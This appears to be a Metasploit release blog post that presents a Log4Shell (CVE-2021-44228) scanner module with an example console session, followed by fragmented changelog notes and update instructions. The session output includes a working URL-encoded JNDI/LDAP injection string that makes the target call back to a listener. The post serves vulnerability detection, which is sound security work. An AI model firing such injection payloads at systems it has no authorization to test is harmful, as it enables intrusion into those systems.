Versions of Apache Log4j impacted by CVE-2021-44228 which allow JNDI features used in configuration, log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints.
This module will scan an HTTP endpoint for the Log4Shell vulnerability by injecting a format message that will trigger an LDAP connection to Metasploit. This module is a generic scanner and is only capable of identifying instances that are vulnerable via one of the pre-determined HTTP request injection points.
This module has been successfully tested with:
Example usage:
msf6 > use auxiliary/scanner/http/log4shell_scanner
msf6 auxiliary(scanner/http/log4shell_scanner) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 auxiliary(scanner/http/log4shell_scanner) > set SRVHOST 192.168.159.128
SRVHOST => 192.168.159.128
msf6 auxiliary(scanner/http/log4shell_scanner) > set RPORT 8080
RPORT => 8080
msf6 auxiliary(scanner/http/log4shell_scanner) > set TARGETURI /struts2-showcase/
TARGETURI => /struts2-showcase/
msf6 auxiliary(scanner/http/log4shell_scanner) > run
[*] Started service listener on 192.168.159.128:389
[+] Log4Shell found via /struts2-showcase/%24%7bjndi%3aldap%3a%24%7b%3a%3a-/%7d/192.168.159.128%3a389/r7yol50kgg7be/%24%7bsys%3ajava.vendor%7d_%24%7bsys%3ajava.version%7d%7d/ (java: BellSoft_11.0.13)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/log4shell_scanner) >
For more details, please see the official Rapid7 Log4Shell CVE-2021-44228 analysis.
/wp-admin/options.php
. Additionally, several WordPress modules were updated to more descriptively report which plugin they found as being vulnerable on a given target.lib
folder have now been updated to declare Meterpreter compatibility requirements, which will allow users to more easily determine when they are using a library that the current session does not support.sessions --upgrade 1
RHOSTS
, which allows one to specify the username, password, and the port if it’s specified as a string such as tcp://user:a b [email protected]
which would translate into the username user
, password a b c
, and host example.com
on the default port used by the module in question.lib/msf/core/auxiliary/report.rb
has been improved to fix an error whereby the report_vuln()
would crash if vuln
was nil
prior to calling framework.db.report_vuln_attempt()
. This has been fixed by checking the value of vuln
and raising a ValidationError if it’s set to nil
.creds -d
command which crashed on some NTLM
hashes.nil
prior to being used when saving credentials with Kiwi. This has been addressed by adding improved error checking and handling.As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git
user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).